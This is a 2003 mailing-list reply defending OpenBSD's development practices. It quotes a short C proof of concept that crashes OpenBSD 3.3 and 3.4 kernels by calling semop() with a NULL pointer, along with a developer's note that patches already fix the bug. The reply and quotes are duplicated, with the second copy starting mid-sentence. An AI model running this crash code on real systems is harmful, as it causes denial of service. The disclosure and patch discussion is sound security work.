I think alot of people are missing the point of OpenBSD. They only focus
on removing security related (privilege escalation, and so forth) flaws
from their software. That's what ProPolice and W^X and all the other stuff
is about. It is a project lacking a lot of good developers who are instead
focused on Linux or Free/NetBSD. Many of it's contributions make it back up
into the trees of the more mainstream projects, OpenSSH/SSL, crypto devices,
pf, and more.
I really don't get the consistent OpenBSD bashing that goes on here. They do
a lot of good work, and if you keep noticing a lack of 'basic QA and unit
testing' and other flaws you should try to contribute. The reason they lack
many of these ameneties that other projects have is that they are a much
smaller organization.
On Sat, Nov 22, 2003 at 11:39:23PM +0100, Henning Brauer wrote, and it was proclaimed:
> On Fri, Nov 21, 2003 at 05:46:01PM -0500, noir (at) uberhax0r (dot) net [email concealed] wrote:
> > a project lacking the basic QA and unit testing and here is the outcome:
> >
> > #include <stdio.h>
> > #include <sys/types.h>
> > #include <sys/sem.h>
> > #include <sys/ipc.h>
> >
> > int
> > main()
> > {
> > int i;
> >
> > for(i = 0; i < 0x40; i++)
> > semop(i, (struct sembuf *) NULL, 0);
> >
> > }
> >
> >
> > PANIC in OpenBSD 3.3 and 3.4 is confirmed.
>
> please note that patch 008 for OpenBSD 3.4 / 013 for OpenBSD 3.3 fixes
> that issue.
> This patch was out _before_ the above post.
>
> It's not really hard to look at the patch and post to fd and bugtraq
> afterwards...
>
> --
> Henning Brauer, BS Web Services, http://bsws.de
> hb (at) bsws (dot) de [email concealed] - henning (at) openbsd (dot) org [email concealed]
> Unix is very simple, but it takes a genius to understand the simplicity.
> (Dennis Ritchie)
on removing security related (privilege escalation, and so forth) flaws
from their software. That's what ProPolice and W^X and all the other stuff
is about. It is a project lacking a lot of good developers who are instead
focused on Linux or Free/NetBSD. Many of it's contributions make it back up
into the trees of the more mainstream projects, OpenSSH/SSL, crypto devices,
pf, and more.
I really don't get the consistent OpenBSD bashing that goes on here. They do
a lot of good work, and if you keep noticing a lack of 'basic QA and unit
testing' and other flaws you should try to contribute. The reason they lack
many of these ameneties that other projects have is that they are a much
smaller organization.
On Sat, Nov 22, 2003 at 11:39:23PM +0100, Henning Brauer wrote, and it was proclaimed:
> On Fri, Nov 21, 2003 at 05:46:01PM -0500, noir (at) uberhax0r (dot) net [email concealed] wrote:
> > a project lacking the basic QA and unit testing and here is the outcome:
> >
> > #include <stdio.h>
> > #include <sys/types.h>
> > #include <sys/sem.h>
> > #include <sys/ipc.h>
> >
> > int
> > main()
> > {
> > int i;
> >
> > for(i = 0; i < 0x40; i++)
> > semop(i, (struct sembuf *) NULL, 0);
> >
> > }
> >
> >
> > PANIC in OpenBSD 3.3 and 3.4 is confirmed.
>
> please note that patch 008 for OpenBSD 3.4 / 013 for OpenBSD 3.3 fixes
> that issue.
> This patch was out _before_ the above post.
>
> It's not really hard to look at the patch and post to fd and bugtraq
> afterwards...
>
> --
> Henning Brauer, BS Web Services, http://bsws.de
> hb (at) bsws (dot) de [email concealed] - henning (at) openbsd (dot) org [email concealed]
> Unix is very simple, but it takes a genius to understand the simplicity.
> (Dennis Ritchie)
[ reply ]